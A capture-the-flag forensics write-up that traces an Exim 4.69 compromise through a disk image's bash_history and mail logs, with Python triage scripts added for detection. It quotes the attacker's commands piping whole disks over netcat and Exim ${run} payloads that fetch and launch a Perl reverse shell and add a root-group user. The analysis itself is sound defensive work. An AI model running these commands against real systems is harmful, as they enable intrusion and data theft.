The vulnerability that opened the door

Written by Erik on

CTF challenge about a system intrusion

Description:

An acquaintance has provided us with a disk image of a server that he says “is doing strange things”. From the INCIBE laboratory we have seen that there was “something strange” about some program, and we need a second opinion from an expert.

Can you help us identify the vulnerable application?

  • File: DiscoS.zip
  • Password: Gr33n2015##

Table of Contents

  1. Extracting the zip
  2. Mount the image
  3. Analyze command history
  4. Analyzing malicious application
  5. Corrupted logs

1- Extracting the zip

Download DiscoS.zip and extract it using the provided password.

unzip discoS.zip

[Screenshot: unzip output]

2- Mount the image

The archive contains a disk image; we mount it in a folder to see what it contains (for evidence handling, mounting read-only with -o ro,loop avoids altering the image).

mkdir disco
sudo mount discoS.img disco

[Screenshot: mount output]

3- Analyze command history

We were told that this system image has something strange on it, possibly something malicious. So we first check whether the root user was used and, if so, what commands were executed as administrator. Bear in mind that .bash_history is only written when a shell exits and can be edited, so it is a lead rather than a complete record.

cat root/.bash_history

[Screenshot: root/.bash_history contents]

What did the attacker do as an administrator?


1- Removes the exim program from the system

apt-get remove exim4
apt-get remove exim4-base
apt-get remove exim4-daemon-light
dpkg -l | grep exim
apt-get remove exim4-config
dpkg --purge
apt-get remove exim
dpkg -l | grep exim

2- Checks the current working directory, creates a folder called exim4 and enters it.

pwd
mkdir exim4
cd exim4/

3- With scp, copies all the files over SSH from the attacker's host (192.168.56.1) into the new folder.

scp yom@192.168.56.1:/home/yom/temporary/exim4/* .

4- Installs the vulnerable Exim packages that were downloaded from his own machine.

  • This version of Exim has a critical vulnerability.
  • Exim 4.69: remote code execution via a buffer overflow (heap memory corruption).
  • --ignore-depends forces the installation even though the package dependencies are not satisfied.

dpkg -i exim4_4.69-9_all.deb
dpkg -i --ignore-depends=exim4-base,exim4-daemon-light exim4_4.69-9_all.deb
dpkg -i exim4-base_4.69-9_i386.deb
dpkg -i exim4-config_4.69-9_all.deb
dpkg -i exim4-base_4.69-9_i386.deb
dpkg -i exim4-daemon-light_4.69-9_i386.deb

5- Once all the vulnerable packages are installed, leaves the folder and deletes it.

cd ..
rm -rf exim4/

6- Stops all CPU operations with the halt command.

  • It instructs the hardware to stop all CPU functions.
  • That is, it halts or restarts the system.

7- Installs the OpenSSH server so that remote connections to the machine are encrypted (SSH).

apt-get install openssh-server
apt-get install openssh-server

8- Configures the vulnerable mail server and reboots the system.

cd /etc/exim4/
ls
vi update-exim4.conf.conf
update-exim4.conf
halt
reboot

9- Finds the paths to the gcc and memdump binaries.

  • memdump was not installed, so he installed it.
  • memdump takes a dump of memory.
  • gcc is a compiler.

whereis gcc
whereis memdump
apt-get install memdump
halt

10- Checks that he has a network connection to his own machine.

ifconfig
ping 192.168.56.1

11- Stealing data

  • The dd command is a very powerful tool: it wipes, verifies, destroys and duplicates data.
  • He copied the partition over a connection using netcat.
  • The entire contents of the partition were sent over that connection.
  • The attacker, at 192.168.56.1, listened on that port from his machine and redirected all that output to a file on his side, thus making a copy of the partitions across the network.

mount
sudo dd if=/dev/sda | nc 192.168.56.1 4444
dd if=/dev/sda | nc 192.168.56.1 4444
dd if=/dev/sda1 | nc 192.168.56.1 4444

12- Retrieving the transferred data

  • The attacker installs two data-recovery tools to recover data from these partitions in case the copies were corrupted.

apt-get install ddrescue
apt-get install dcfldd
    
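As an added example (not part of the original write-up), a small Python triage of a recovered bash_history that flags the indicators found in the steps above: Exim removed and a downgraded 4.69 reinstalled with dependency checks bypassed, files pulled from an outside host with scp, whole block devices piped to netcat, and recovery tools installed afterwards. The sample history is constructed from the commands quoted in this section; the rule names are my own.

```python
import re
from collections import Counter

# Indicator rules mirroring what the bash_history on this image revealed.
RULES = {
    "mta-removed": re.compile(r"^apt-get\s+(remove|purge)\s+exim"),
    "dpkg-ignore-depends": re.compile(r"^dpkg\s+-i\b.*--ignore-depends"),
    "downgraded-exim-pkg": re.compile(r"^dpkg\s+-i\b.*exim4.*4\.69"),
    "scp-from-external-host": re.compile(r"^scp\s+\S+@(\d{1,3}(?:\.\d{1,3}){3}):"),
    "disk-exfil-over-netcat": re.compile(r"\bdd\s+if=/dev/\S+.*\|\s*nc\s+(\S+)\s+(\d+)"),
    "memory-dump-tool": re.compile(r"^apt-get\s+install\s+memdump"),
    "recovery-tool-install": re.compile(r"^apt-get\s+install\s+(ddrescue|dcfldd)"),
}

def triage_history(lines):
    """Return (line_no, command, tag) for every history line that matches a rule."""
    hits = []
    for no, raw in enumerate(lines, 1):
        cmd = raw.strip()
        if cmd.startswith("sudo "):      # rules are written against the bare command
            cmd = cmd[len("sudo "):]
        for tag, rx in RULES.items():
            if rx.search(cmd):
                hits.append((no, cmd, tag))
    return hits

def summarize(hits):
    """Count hits per indicator tag."""
    return Counter(tag for _, _, tag in hits)

def exfil_destinations(lines):
    """Host:port pairs that raw block devices were piped to with netcat."""
    rx = RULES["disk-exfil-over-netcat"]
    return {f"{m.group(1)}:{m.group(2)}" for m in map(rx.search, lines) if m}

# Constructed sample modelled on the commands quoted in this write-up (not the image's own file).
SAMPLE_HISTORY = """\
apt-get remove exim4
dpkg -l | grep exim
scp yom@192.168.56.1:/home/yom/temporary/exim4/* .
dpkg -i --ignore-depends=exim4-base,exim4-daemon-light exim4_4.69-9_all.deb
dpkg -i exim4-daemon-light_4.69-9_i386.deb
apt-get install openssh-server
sudo dd if=/dev/sda | nc 192.168.56.1 4444
dd if=/dev/sda1 | nc 192.168.56.1 4444
apt-get install dcfldd
""".splitlines()
```

Run `triage_history` over the real file with `open("root/.bash_history").read().splitlines()`; a line can carry more than one tag, as the forced dpkg install does here.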


4- Analyzing malicious application

We have already seen that the malicious application is Exim, a mail transfer agent.

Exim version 4.69 contains a critical vulnerability.

Discovered in 2011, it was one of the main causes of botnets at the time.

By sending a specially crafted message, an attacker can corrupt the heap (a buffer overflow) and execute arbitrary code with the privileges of the Exim user (CVE-2010-4344).

  • An additional vulnerability (CVE-2010-4345) was also used; this was the attack that led to the discovery that there was an intruder on the system.
  • This bug allows a local user to obtain root privileges from the Exim account (the account running the mail service).
  • If the Perl interpreter is present on the remote system, the exploit module also automatically exploits this secondary bug to obtain root.
  • That is why this flaw was so serious: it chained an RCE with an LPE, and caused such a disaster.

- RCE: CVE-2010-4344
- LPE: CVE-2010-4345

Exploits and more info: EXIM 4.69 RCE

I leave a video of how to exploit this security flaw using a Metasploit module: https://www.youtube.com/watch?v=DnSgOGIxjaQ

5- Corrupted Logs

Once we know how all this happened, we look at the logs, which hold the main record of the exploitation.

ls var/log/exim4

[Screenshot: contents of var/log/exim4]

Buffer overflow log:

cat var/log/exim4/rejectlog

[Screenshot: rejectlog showing the buffer overflow attempts]

He tried to download the file by triggering the overflow, and one of the requests succeeded; once the Perl file was downloaded from his attacking machine, he placed it in /tmp as user exim and executed it as that user.

cat var/log/exim4/mainlog

This Perl script opens a socket connection, creating a remote session from the victim computer to the attacker.

${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}}

[Screenshot: the ${run{...}} payload in mainlog]

Perl exploit that opens a reverse shell to the attacker's computer (it is launched through Exim to connect back to the attacker remotely):

  • This is the Remote Code Execution.
  • This is how the attacker was connected.

[Screenshot: the Perl reverse-shell script]

cat var/log/exim4/mainlog

Creates a new user whose primary group is root (--gid root) with an MD5-hashed password.

  • This is the Local Privilege Escalation.
  • This is how he became root.

${run{/bin/sh -c "exec /bin/sh -c 'useradd --gid root --create-home --password  0 0mkpasswd -H md5 Ulyss3s) ulysses'"}}

[Screenshot: the user-creation payload in mainlog]
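As an added example (not the author's code), a Python scanner that pulls the ${run{...}} string-expansion items out of Exim log lines by brace matching and tags what each injected command does: download URL, connect-back host and port, account creation. The two payloads in the sample are the ones quoted above; the surrounding log wording, timestamps and message IDs are constructed, and the $(mkpasswd ...) substitution is my assumed reading of the garbled line above.

```python
import re

RUN_MARKER = "${run{"

INDICATORS = {   # what an analyst wants pulled out of an injected command
    "downloader": re.compile(r"\b(wget|curl)\s+(https?://\S+)"),
    "reverse-shell": re.compile(r"\bperl\s+(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)"),
    "account-creation": re.compile(r"\buseradd\b.*?--gid\s+(\w+).*\s(\w+)\W*$"),
}

def extract_run_payloads(line):
    """Return the body of every ${run{...}} item in a line, found by brace matching."""
    payloads = []
    pos = line.find(RUN_MARKER)
    while pos != -1:
        start = pos + len(RUN_MARKER)
        depth, i = 1, start
        while i < len(line) and depth:
            depth += {"{": 1, "}": -1}.get(line[i], 0)
            i += 1
        if depth == 0:                      # balanced: line[i-1] is the closing brace
            payloads.append(line[start:i - 1])
        pos = line.find(RUN_MARKER, i)
    return payloads

def classify(payload):
    """Tag what the injected command does and return the values to pivot on."""
    found = {}
    if m := INDICATORS["downloader"].search(payload):
        found["downloads"] = m.group(2)
    if m := INDICATORS["reverse-shell"].search(payload):
        found["connects_back"] = f"{m.group(2)}:{m.group(3)}"
    if m := INDICATORS["account-creation"].search(payload):
        found["creates_user"] = (m.group(2), m.group(1))   # (user, primary group)
    return found

def scan_log(lines):
    """(line_no, payload, tags) for every log line carrying a ${run{ expansion."""
    return [(n, p, classify(p)) for n, line in enumerate(lines, 1)
            for p in extract_run_payloads(line)]

# Constructed sample: the payloads are the ones quoted above, the log wording is assumed.
SAMPLE_MAINLOG = [
    '2011-10-03 10:14:03 1RAb0X-0000Cq-4k ** postmaster@victim.test R=localuser T=local_delivery: '
    'Expansion of "${run{/bin/sh -c "exec /bin/sh -c \'wget http://192.168.56.1/c.pl -O /tmp/c.pl;'
    'perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000\'"}}" failed',
    '2011-10-03 10:21:47 1RAb0Z-0000Cs-1Q ** root@victim.test R=localuser T=local_delivery: '
    'Expansion of "${run{/bin/sh -c "exec /bin/sh -c \'useradd --gid root --create-home '
    '--password $(mkpasswd -H md5 Ulyss3s) ulysses\'"}}" failed',
]
```

Feed `scan_log` the lines of var/log/exim4/mainlog and rejectlog; the hosts and URLs it returns are the pivots for the rest of the timeline (the scp source, the netcat listener and the download server were all the same address here).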

In /tmp we can see the c.pl file (which generated that connection) and a tar archive named rk.tar.

[Screenshot: files in /tmp]

Analyzing the rk file, we realize that it is a rootkit, which sets up a backdoor into the system using iptables rules among other things.

[Screenshot: contents of the rootkit]


Hi! I'm Erik. I love computer security, and in my spare time I do bug bounty or research.
Every day I try to learn something new, no matter how small it is.